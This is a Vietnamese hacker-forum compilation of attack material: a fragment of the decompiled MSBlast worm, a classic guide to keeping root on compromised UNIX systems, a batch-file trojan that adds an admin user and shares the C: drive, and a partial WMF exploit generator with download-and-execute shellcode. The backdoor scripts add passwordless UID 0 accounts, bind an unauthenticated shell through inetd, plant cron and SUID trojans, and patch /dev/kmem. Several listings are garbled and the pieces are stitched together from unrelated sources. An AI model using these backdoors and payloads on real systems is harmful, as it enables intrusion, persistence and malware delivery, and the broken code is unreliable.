(GetLastError() == 0xb7) ExitProcess(0); if ((WSAStartup(0x202, & WSAData) != 0) || (WSAStartup(0x101, & WSAData) != 0) || (WSAStartup(0x001, & WSAData) != 0)) return -1; /* We need to know where MSBlast.exe is located so that we can redistribute it. */ GetModuleFileNameA(0, &Filename, 0x104); /* Idle Event We wait for a connection to the internet to be established before we can proceed */ while

(InternetGetConnectedState(& ThreadId, 0) == 0) Sleep(0x4e20); /* Generate Random IP Address */ i_ip_D = 0; srand(GetTickCount()); randomip_A = rand() % 0xFE;

randomip_A++; randomip_B = rand() % 0xFE; /* Get Host Machine IP */ if

(gethostname(& local_ip_address, 0x200) != ffffffff) { _hostent = gethostbyname(& local_ip_address); if (_hostent != 0) { if (_hostent.hlength != 0) { memcpy( &in, &_hostent.hlength, 4); sprintf(&local_ip_address, "%s", inet_ntoa(in.S_un)); temp_ip_buf = strtok(&local_ip_address, "."); /* Split ip address into A.B.C.(D) */ i_ip_A = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_B = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_C = atoi(temp_ip_buf); if (i_ip_C > 0x14)

{ srand(GetTickCount()); i_ip_C -= rand() % 0x14; } /* Don't use Random IP Addresses */ randomip_A = i_ip_A; randomip_B = i_ip_B; status = true; } } }

srand(GetTickCount()); if ((rand() % 0x14) < 12) status = 0; i_ip_D_? = 1; if ((rand % 0xA) > 7) i_ip_D_? = 2; if (status == 0) { i_ip_A = rand() % 0xFE; i_ip_A++; i_ip_B = rand() % 0xFE; i_ip_C = rand() % 0xFE; } /* Get Date */ GetDateFormatA(0x409, 0, 0, &"d", &day_of_month, 3); GetDateFormatA(0x409, 0, 0, &"M", &month, 3); /* Payload. Run payload() if the date is right ??? */ if ( (atoi(& day_of_month) > 15) || (atoi(& month) > 8) ) CreateThread(0, 0, payload, 0, 0, &ThreadId); /* Spreadworm */ while (1)

spreadworm(); /* Sense of Humour The remainder of the code will never get executed */ WSACleanup(); return 0;}

Làm vài Backdoor chơi

Sau đây là hướng dẫn viết Backdoor cọp-py trên mạng. Dốt tiếng Anh nên không dám dịch, sợ dịch sai không thấy backdoor đâu mà lại chết :> Có bác siêu English dịch dùm nhá.


Ok You've been at it for all night Trying all the exploits you can think of The system seems tight The system looks tight

The system *is* tight You've tried everything Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect

permissions, race conditions, SUID exploits, Sendmail bugs, and so on Nothing WAIT! What's that!?!? A "#" ???? Finally!

After seeming endless toiling, you've managed to steal root Now what? How you hold onto this precious super-user

privilege you have worked so hard to achieve ?

This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike. From a hacking perspective, it is obvious what good this paper will do you. Admins can likewise benefit from this paper. Ever wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your system?

This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are ways into one.

Beforehand

Know the location of critical system files This should be obvious (If you can't list any of the top of your head, stop reading

now, get a book on UNIX, read it, then come back to me ) Familiarity with passwd file formats (including general field

format, system specific naming conventions, shadowing mechanisms, etc ) Know vi Many systems will not have those

robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful when you need to quickly search and edit a large file. If

you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a

nice, FAT scrollback buffer This will come in handy if you want to cut and paste code, rc files, shell scripts, etc

The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and

skilled administrator will be wise to many (if not all) of these backdoors But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time

to come One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be

looking for back doors

The Overt

[1] Add a UID account to the passwd file This is probably the most obvious and quickly discovered method of rentry It


prepend or append it Anyone causally examining the passwd file will see this So, why not stick it in the middle

#!/bin/csh

# Inserts a UID account into the middle of the passwd file
#
# Review notes on this transcription (the code below is kept verbatim):
#  - the two '@' arithmetic lines lost their numeric operands, so as
#    printed they are syntax errors;
#  - several statements were folded onto the tail of a '#' comment when
#    lines were joined (the cp/echo after "cd", the echo after "split"
#    that writes the UID 0 entry, and the final rm), so csh never runs
#    them as written;
#  - split names its output xaa, xab, ... in the current directory, which
#    after the bare "cd" is $HOME, while the later lines use /xaa and
#    /xab at the filesystem root -- unless $HOME is /, the mv fails;
#  - the entry it intends to add has an empty password field (::0:0:),
#    i.e. a passwordless root-equivalent login.
#  Any of the work files left behind (/temppass, /xaa, /xab), or any extra
#  UID 0 line in /etc/passwd, is a straightforward indicator for a defender.

# There is likely a way to this in 1/2 a line of AWK or SED Oh well

# daemon9@netcom.com

# Word list from wc: $linecount[1] is the line count.
set linecount = `wc -l /etc/passwd`

cd # Do this at home cp /etc/passwd /temppass # Safety first echo passwd file has $linecount[1] lines

@ linecount[1] /=

@ linecount[1] += # we only want temp files echo Creating two files, $linecount[1] lines each \(or approximately that\)

# Intent: halve the file, append the new entry to the first half, then the second half.
split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa cat /xab >> /xaa

mv /xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand rm /xa* /temppass

echo Done

NEVER, EVER, change the root password The reasons are obvious

[2] In a similar vein, enable a disabled account as UID 0, such as sync. Or, perhaps, an account somewhere buried deep in the

passwd file has been abandoned, and disabled by the sysadmin. Change its UID to 0 (and remove the '*' from the second

field).

[3] Leave an SUID root shell in /tmp #!/bin/sh

# Everyone's favorite

cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that chmod 4755 /tmp/.evilnaughtyshell

Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted

nosuid, which stops the set-uid bit from taking effect on anything stored there. You can change all of these, but if the filesystem starts filling up, people may

notice (but, hey, this *is* the overt section). I will not detail the changes necessary because they can be quite system

specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.

The Veiled

(31)

background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the

appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical

lines look like this:

(1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd

Field (1) is the daemon name that should appear in /etc/services This tells inetd what to look for in /etc/services to determine

which port it should associate the program name with (2) tells inetd which type of socket connection the daemon will expect

TCP uses streams, and UDP uses datagrams Field (3) is the protocol field which is either of the two transport protocols, TCP

or UDP Field (4) specifies whether or not the daemon is iterative or concurrent A 'wait' flag indicates that the server will

process a connection and make all subsequent connections wait 'Nowait' means the server will accept a connection, spawn a

child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more

importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual

command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.

This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it

with something else A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd

file, etc

For the insinuation-impaired, try this:

Open the /etc/inetd.conf in an available editor Find the line that reads:

daytime stream tcp nowait root internal and change it to:

daytime stream tcp nowait /bin/sh sh -i

You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and

restart the process (kill -9 <pid>, then /usr/sbin/inetd or /usr/etc/inetd), which will interrupt ALL network connections (so it is a good idea

to do this during off-peak hours).

[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice One

(32)

[an entry is needed in] /etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:

(1) (2)/(3) (4) smtp 25/tcp mail

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name

associated with the service For instance, add this line to /etc/services:

evil 22/tcp evil and this line to /etc/inetd.conf:

evil stream tcp nowait /bin/sh sh -i Restart inetd as before

Note: Potentially, these are VERY powerful backdoors. They not only offer local re-entry from any account on the system,

they offer re-entry from *any* account on *any* computer on the Internet — and, because `sh -i` asks for no credentials, to anyone else who port-scans the host, not just to whoever installed it. [6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's

crontab will, well, run as root. Again, depending on the level of experience of the sysadmin (and the implementation), this

backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have

several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.

It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,

or view your crontab entries. It is just as easy to manually edit the /var/spool/cron/crontabs/root file as it is to use crontab. A crontab

entry has six fields:

(1) (2) (3) (4) (5) (6)

* * /usr/bin/updatedb

Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week

(0-6). Field (6) is the command (or shell script) to execute. The example above runs on Mondays (day-of-week 1); the values of its other four time fields were lost in transcription. To exploit cron,

simply add an entry into /var/spool/crontab/root For example: You can have a cronjob that will run daily and look in the

/etc/passwd file for the UID account we previously added, and add him if he is missing, or nothing otherwise (it may not

be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions) Add this line to /var/spool/crontab/root:

(33)

#!/bin/csh

# Is our eviluser still on the system? Let's make sure he is #daemon9@netcom.com
#
# Review notes (code kept verbatim): re-adds the account from [1] whenever
# grep finds no match.  Visible defects in this listing:
#  - the grep pattern is "eviluser" but the entry written below is
#    "EvilUser"; grep is case-sensitive, so the test never matches and the
#    insertion branch runs on every cron invocation;
#  - as in [1], the numeric operands of the '@' lines are missing, and the
#    cp, the echo that appends the entry, and the rm were folded into '#'
#    comments when lines were joined, so csh does not execute them here;
#    the joined "cat ... mv ..." and "rm ... echo Done" lines likewise no
#    longer mean what the author intended;
#  - split writes xaa/xab into the current directory ($HOME after the bare
#    cd), whereas the later lines use /xaa and /xab.

set evilflag = (`grep eviluser /etc/passwd`)

# Zero words from grep means no match: (re)insert the account.
if($#evilflag == 0) then # Is he there?

set linecount = `wc -l /etc/passwd`

cd # Do this at home cp /etc/passwd /temppass # Safety first @ linecount[1] /=

@ linecount[1] += # we only want temp files

split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa

cat /xab >> /xaa mv /xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm /xa* /temppass echo Done

else endif

[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the

/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root

account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a

copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).

Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything

would be ok. (That minute of failed logins, at the same time every night, is also what a defender will see in the auth logs.) Add this line to root's crontab file: 29 2 * * * /bin/usr/sneakysneaky_passwd

make sure this exists:

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky

and this is the simple shell script: #!/bin/csh

(34)

# [7] Cron-based trojan II, run from root's crontab: swap in the one-entry
# passwd (/var/spool/mail/.sneaky) for a minute, then restore the original.
# Review notes (code kept verbatim):
#  - the swap is not atomic: if this is killed or the host reboots during
#    the sleep, /etc/passwd stays replaced and the genuine file is left as
#    /etc/.temppass -- an easy artefact for a defender to look for;
#  - as transcribed, "sleep 60" was joined onto the second cp line, so cp
#    receives four arguments; if cp rejects them, /etc/passwd is never
#    replaced and the mv simply restores the copy immediately;
#  - the root hash "1234567890123" shown in the text is presumably only a
#    stand-in for the attacker's chosen password hash;
#  - every login and user lookup fails during the window.
cp /etc/passwd /etc/.temppass

cp /var/spool/mail/.sneaky /etc/passwd sleep 60

mv /etc/.temppass /etc/passwd

[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.

Make sure it runs as root. Name it something innocuous. Hide it well. /* A little trojan to create an SUID root shell, if the proper argument is

given. C code, rather than shell, to make its effects less obvious */ /* daemon9@netcom.com */

#include

/* [8] Compiled "keyword" trojan.
 * Behaviour: if argv[1] equals KEYWORD, copy /bin/csh to the hidden path
 * /bin/.swp121 and make it a setuid-root binary (chown root; chmod 4755);
 * this only succeeds when the program itself runs as root.  It then prints
 * a fake progress message for ~10 s so it looks like a harmless utility.
 * Transcription notes: the #include header names were stripped from this
 * listing (printf -> stdio.h, strcmp -> string.h, system -> stdlib.h,
 * sleep -> unistd.h), the two #defines and the main() header were joined
 * onto one line, and BUFFERSIZE is never used.
 * Defender's note: the artefact it leaves is a root-owned setuid dotfile
 * in /bin, which `find / -perm -4000 -user root` (or any setuid baseline
 * comparison) reports regardless of the name chosen here. */
#define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc;

char *argv[];{ int i=0;

/* Only act when an argument is present and equals the trigger keyword. */
if(argv[1]){ /* we've got an argument, is it the keyword? */

if(!(strcmp(KEYWORD,argv[1]))){

/* This is the trojan part */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); }

}

/* Put your possibly system specific trojan

messages here */

/* Let's look like we're doing something */

printf("Sychronizing bitmap image records.");

/* Decoy: ten one-second ticks on stderr.  The printf above has no newline,
 * so if stdout is line-buffered its text only appears with "Done" below. */
/* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){

fprintf(stderr,"."); sleep(1);

}

printf("\nDone.\n"); return(0);

} /* End main */

[9] The sendmail aliases file The sendmail aliases file allows for mail sent to a particular username to either expand to several

(35)

"decode: "|/usr/bin/uudecode"

to the /etc/aliases file. (This is the classic "decode" alias; because it pipes arbitrary mail into uudecode, most modern sendmail installs ship it commented out or absent, and finding it live in /etc/aliases is itself a finding.) Usually, you would then create a uuencoded rhosts file with the full pathname embedded

#! /bin/csh

# Builds a uuencoded /root/.rhosts containing "+ +" -- rlogin/rsh trust
# for every user on every host -- and writes the encoded text to stdout,
# to be mailed to sendmail's "decode" alias.  As transcribed, the echo
# that creates tmpfile sits inside the comment on the next line, so
# tmpfile never exists and uuencode fails.
# Create our rhosts file Note this will output to stdout echo "+ +" > tmpfile

/usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body the uuencoded version of the

.rhosts file. For a one liner (not faked, however) do this:

%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your

choosing Many of the previous scripts and methods can be employed here

The Covert

[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as Tripwire

(or by comparing the installed binary against the vendor's package checksums). The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this

case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some

general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you

are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)

Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:

get input;

if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue;

else quit with error;

Not complex or difficult Trojans of this nature can be done in less than 10 lines of additional code

The Esoteric

(36)

to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write

permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of

your current process, then spawn a csh, which will inherit this UID. The following program does just that. (As reproduced here the listing is damaged: the #include header names are missing; the statement(s) after the first "Cannot seek to user page" perror appear to have been lost at the page break; the open() and first lseek() lines each have an unbalanced parenthesis; and the "Current GID" printf reads userpage.g_ruid, which is not a struct user field — the write path uses u_rgid, presumably what was meant.)

/* If /dev/kmem is readable and writable, this program will change the user's

UID and GID to 0 */

/* This code originally appeared in "UNIX security: A practical tutorial"

with some modifications by daemon9@netcom.com */ #include

#include #include #include #include #include #include

#define KEYWORD "nomenclature1" struct user userpage;

long address(), userlocation; int main(argc, argv, envp) int argc;

char *argv[], *envp[];{ int count, fd;

long where, lseek();

if(argv[1]){ /* we've got an argument, is it the keyword? */

if(!(strcmp(KEYWORD,argv[1]))){

fd=(open("/dev/kmem",O_RDWR); if(fd<0){

printf("Cannot read or write to /dev/kmem\n");

perror(argv); exit(10); }

userlocation=address();

where=(lseek(fd,userlocation,0);

if(where!=userlocation){

printf("Cannot seek to user page\n"); perror(argv);

(37)

count=read(fd,&userpage,sizeof(struct user));

if(count!=sizeof(struct user)){

printf("Cannot read user page\n"); perror(argv);

exit(30); }

printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid);

userpage.u_ruid=0; userpage.u_rgid=0;

where=lseek(fd,userlocation,0); if(where!=userlocation){

printf("Cannot seek to user page\n"); perror(argv);

exit(40); }

write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

execle("/bin/csh","/bin/csh","-i",(char *)0, envp);

} }

} /* End main */ #include

#include #include

#define LNULL ((LDFILE *)0) long address(){

LDFILE *object; SYMENT symbol; long idx=0;

object=ldopen("/unix",LNULL); if(!object){

fprintf(stderr,"Cannot open /unix.\n"); exit(50);

}

(38)

ldclose(object);

return(symbol.n_value); }

}

fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60);

}

[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take

care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a

discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]: (Note that a world-writable /dev/kmem, even briefly, is exactly what a periodic permission audit of /dev flags, and that modern kernels generally do not expose a writable /dev/kmem at all.)

chmod 666 /dev/kmem

sleep 300 # Nap for minutes

chmod 600 /dev/kmem # Or whatever it was before

From The Infinity Concept Issue II

Tự làm "con trojan"

- Starting -

-:Server:-Mục đích share ổ C tạo user với quyền admin Bước 1:

Mở DOS prompt và Notepad.

DOS prompt để ta kiểm tra command đã chuẩn chưa, Notepad để ta tạo file .bat

Mở Notepad và đánh các dòng lệnh sau: Lệnh 1-> net user abc /add

(tạo user có tên abc )

Lệnh 2-> net localgroup administrators abc /add Add user group

Lệnh 3->net share system=C:\ /unlimited Share ổ C

(39)

Lệnh 4-> net send ipcuaminh hello !

Khi mở file bat có mess gửi đến máy mình biết IP được

Xem ip dùng lệnh : ipconfig

-: Client

: -Sau khi nạn nhân mở file .bat, ta gõ các lệnh sau trên máy mình

1 -> net use \\victim_ip abc 2-> explorer \\victimip\system

-Ai rảnh test xem Cái vui vẻ thui ko hoanh tráng nên ai thấy ngứa đừng chửi nhé, công ra

Cách tạo File WMF gắn vào web ! Exploit Code (lưu ý: chính header của đoạn mã gọi đây là WMF "nDay" — lỗi đã được biết và đã vá — chứ không phải 0-day; mã chỉ được đăng một phần):

/* \

/ WMF nDay download() Exploit Generator \ by Unl0ck Research Team

/ \

/ greetz:

rst/ghc { ed, uf0, fost },

uKt { choix, nekd0, payhash, antq }, blacksecurity { #black } ,

0x557 { kaka, swan, sam, nolife }, sowhat, tty64 { izik };

This sploit is now full shit, so kiddies party has been started!!! urs,

darkeagle \

/ */

#include <stdio.h> #include <winsock2.h>

(40)

#define PROC_BEGIN asm _emit 0x90 asm _emit 0x90\

asm _emit 0x90 asm _emit 0x90\

asm _emit 0x90 asm _emit 0x90\

asm _emit 0x90 asm _emit 0x90 #define PROC_END PROC_BEGIN

#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define SEARCH_LEN #define MAX_SC_LEN 2048 #define HASH_KEY 13 // Define Decode Parameter

#define DECODE_LEN 21 #define SC_LEN_OFFSET #define ENC_KEY_OFFSET 11 #define ENC_KEY 0xff // Define Function Addr

#define ADDR_LoadLibraryA [esi] #define ADDR_GetSystemDirectoryA [esi+4] #define ADDR_WinExec [esi+8] #define ADDR_ExitProcess [esi+12] #define ADDR_URLDownloadToFileA [esi+16] // Need functions

// Names the stager resolves at run time; the order defines the [esi] slot
// layout used by the ADDR_* macros above.  Together -- LoadLibraryA,
// GetSystemDirectoryA, WinExec, ExitProcess, URLDownloadToFileA -- they
// describe a plain download-and-execute payload (fetch a URL into the
// system directory, run it, exit).  The empty string terminates the list.
// Transcription note: when lines were joined, every initializer except
// {"GetSystemDirectoryA"} ended up inside a trailing // comment, so the
// table as printed is not the one the shellcode expects.
unsigned char functions[100][128] =

{ // [esi] stack layout // kernel32 // 00 kernel32.dll {"LoadLibraryA"}, // [esi]

{"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},

};

//q dài pót tượng trưng thơi

//

jmp sc_end

sc_start:

(41)

// Get kernel32.dll base addr

mov eax, fs:0x30 // PEB

mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink

lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address

mov esi, edi // Hash string start addr -> esi

// Get function addr of kernel32 push

pop ecx getkernel32:

call GetProcAddress_fun loop getkernel32

// Get function addr of urlmon push 0x00006e6f

push 0x6d6c7275 // urlmon push esp

call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address

/*

push pop ecx geturlmon:

call GetProcAddress_fun loop geturlmon

*/

call GetProcAddress_fun // url start addr = edi LGetSystemDirectoryA:

sub esp, 0x20 mov ebx, esp push 0x20 push ebx

call ADDR_GetSystemDirectoryA // GetSystemDirectoryA LURLDownloadToFileA:

// eax = system path size

// URLDownloadToFileA url save to a.exe

mov dword ptr [ebx+eax], 0x652E555C // "\U.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax

(42)

push eax

push ebx // %systemdir%\U.exe push edi // url

push eax

call ADDR_URLDownloadToFileA // URLDownloadToFileA //LWinExec:

mov ebx, esp

push 1//executes in SW_SHOW, push if you wanna in SW_HIDE

push ebx

call ADDR_WinExec // WinExec(%systemdir %\a.exe);

Finished:

//push

call ADDR_ExitProcess // ExitProcess(); GetProcAddress_fun:

push ecx push esi

mov esi, [ebp+0x3C] // e_lfanew

mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va

push esi

mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va

xor ecx, ecx dec ecx find_start: inc ecx lodsd

add eax, ebp xor ebx, ebx hash_loop:

movsx edx, byte ptr [eax] cmp dl, dh

jz short find_addr

ror ebx, HASH_KEY // hash key add ebx, edx

inc eax

jmp short hash_loop find_addr:

cmp ebx, [edi] // compare to hash jnz short find_start

pop esi // ExportDirectory

mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va

mov cx, [ebx+ecx*2] // FunctionOrdinal

(43)

mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va

stosd // function address save to [edi]

pop esi pop ecx ret

sc_end:

call sc_start

PROC_END //C macro to end proc }
